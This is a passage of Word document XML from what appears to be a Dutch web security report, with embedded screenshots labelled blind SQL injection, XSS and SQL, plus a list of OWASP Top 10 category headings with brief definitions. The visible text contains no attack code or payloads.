      <w:pPr>
        <w:rPr>
          <w:smallCaps/>
          <w:spacing w:val="5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E8E224" w14:textId="416C6270" w:rsidR="00FD69F0" w:rsidRDefault="00A65BD3" w:rsidP="00FD69F0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253310976" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75F6A722" wp14:editId="5D69416F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-901239</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-899334</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="833" name="Rectangle 83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28301" id="Rectangle 833" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.95pt;margin-top:-70.75pt;width:25pt;height:1031.7pt;z-index:-2500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huJICAACxBQAADgAAAGRycy9lMm9Eb2MueG1srFRRT9swEH6ftP9g+X0kaWG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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FD69F0">
        <w:t>Rapporten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FCFDF1" w14:textId="76094A03" w:rsidR="00FD69F0" w:rsidRPr="00FD69F0" w:rsidRDefault="00576CC1" w:rsidP="00FD69F0">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253315072" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="03F2EE7F" wp14:editId="5D5D23B7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-10795</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>453390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6249035" cy="6400165"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapSquare wrapText="bothSides"/>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BlindSQL.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId145">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6249035" cy="6400165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="604A07D4" w14:textId="77777777" w:rsidR="00576CC1" w:rsidRDefault="00576CC1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A1EE6A" w14:textId="6C3CC3F7" w:rsidR="00B429FB" w:rsidRDefault="002E6339">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253312000" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7C8633A4" wp14:editId="392A063C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-198755</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>252095</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6130925" cy="7079615"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:wrapSquare wrapText="bothSides"/>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XSS.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId146">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6130925" cy="7079615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="008B11D4" w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253314048" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="716CE1CF" wp14:editId="2D83C2FA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-895985</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1008110</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="868" name="Rectangle 86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D220F" id="Rectangle 868" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.55pt;margin-top:-79.35pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F442250" w14:textId="0D0F23C8" w:rsidR="00B429FB" w:rsidRDefault="00B429FB"/>
    <w:p w14:paraId="26BDEB79" w14:textId="77777777" w:rsidR="00C132BF" w:rsidRDefault="00C132BF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E77CE6" w14:textId="40C779D6" w:rsidR="008B11D4" w:rsidRDefault="00C132BF">
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253325312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F99CB74" wp14:editId="5B00FA48">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896081</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-898186</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="878" name="Rectangle 87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0CC33" id="Rectangle 878" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.55pt;margin-top:-70.65pt;width:25pt;height:1031.7pt;z-index:-2499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rVy5ICAACxBQAADgAAAGRycy9lMm9Eb2MueG1srFRRT9swEH6ftP9g+X0kKbCy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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253323264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="28B0D56C" wp14:editId="22F865E1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>325755</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="6603365"/>
            <wp:effectExtent l="25400" t="25400" r="34290" b="26035"/>
            <wp:wrapSquare wrapText="bothSides"/>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ort page 1.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660336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A65BD3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEB6A55" w14:textId="7D779481" w:rsidR="00B429FB" w:rsidRDefault="00C132BF">
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253321216" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6F89244D" wp14:editId="5F1B4370">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-903996</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-900682</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="876" name="Rectangle 87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06A10" id="Rectangle 876" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.2pt;margin-top:-70.85pt;width:25pt;height:1031.7pt;z-index:-2499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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002E6339">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253319168" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3D1F6794" wp14:editId="4394DA98">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-197041</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6251575" cy="6186805"/>
            <wp:effectExtent l="0" t="0" r="0" b="10795"/>
            <wp:wrapSquare wrapText="bothSides"/>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SQL.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId147">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6251575" cy="6186805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00B429FB">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7057B2" w14:textId="72BC235F" w:rsidR="00A65BD3" w:rsidRDefault="00B429FB">
      <w:pPr>
        <w:rPr>
          <w:smallCaps/>
          <w:spacing w:val="5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253261824" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69159319" wp14:editId="1935A3BD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-897890</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-902448</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="797" name="Rectangle 7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FA605" id="Rectangle 797" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.7pt;margin-top:-71pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1818E9A2" w14:textId="1627B138" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP Definities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="0EC7B7FB" w14:textId="1E8C33BB" w:rsidR="00A666A2" w:rsidRPr="009131FF" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009131FF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A1 Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE9E0A4" w14:textId="3E7AD490" w:rsidR="00A666A2" w:rsidRPr="00C5361E" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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0D5BBFDC" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A2 Broken Authentication and Session Management (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DC0AF4" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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7B9CF6AC" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="0013587D" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013587D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A3 Cross Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB021FD" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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3314CA57" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A4 Insecure Direct Object References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA346DE" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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5E4EB2D7" w14:textId="77777777" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C2FD56C" w14:textId="77777777" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="221B589E" w14:textId="77777777" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FC17C44" w14:textId="77777777" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E295A0" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A5 Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1093194F" w14:textId="49681A1F" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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w:t>
      </w:r>
      <w:r w:rsidR="008D40E9" w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253288448" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39BEE6E9" wp14:editId="71AFB1DE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-895211</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1009354</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="856" name="Rectangle 85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DA452" id="Rectangle 856" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.5pt;margin-top:-79.45pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>staan waar hackers gebruik van kunnen maken door de error berichten uit te lezen om andere kwetsbaarheden te ontdekken ook kunnen mappen in het systeem verkeerde permissie rechten hebben ontvangen waardoor iedereen toegang kan verkrijgen tot deze mappen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763E9AAD" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A6 Sensitive Data Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC0DAC7" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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3395EEEB" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A7 Missing Function Level Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FB730F" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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5E79B713" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A8 Cross Site Request Forgery Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E714FAE" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:r w:rsidRPr="001D4F2E">
        <w:t>Cross Site Request Forgery Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0AC91C" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="001D4F2E" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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3CC926BA" w14:textId="77777777" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BDF8850" w14:textId="77777777" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="197D1744" w14:textId="77777777" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF25A00" w14:textId="77777777" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6273AB15" w14:textId="77777777" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A7732DA" w14:textId="77777777" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19E69017" w14:textId="35378761" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253286400" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A8512FD" wp14:editId="46A2F8E1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-895985</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-595874</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="853" name="Rectangle 85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F061C" id="Rectangle 853" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.55pt;margin-top:-46.85pt;width:25pt;height:1031.7pt;z-index:-2500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F/JICAACxBQAADgAAAGRycy9lMm9Eb2MueG1srFRRT9swEH6ftP9g+X0kaWG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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D21D9A" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A9 Using Components with Known Vulnerabilities Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC65C09" w14:textId="0AD55556" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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3CB6D2B2" w14:textId="77777777" w:rsidR="00876608" w:rsidRDefault="00876608" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73C59CDC" w14:textId="05A956FE" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A10 Unvalidated Redirects and Forwards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FD211A" w14:textId="60245BC8" w:rsidR="00CF3AE8" w:rsidRDefault="00A666A2">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148" w:history="1">
        <w:r w:rsidRPr="0028560A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.testwebsite.nl/redirect.php?id=http://testlink.nl</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CF3AE8">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7532B7A9" w14:textId="77777777" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="000E3238">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C56253E" w14:textId="0BB1E591" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="000E3238">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253274112" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3634C096" wp14:editId="75486C00">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896081</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1016887</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
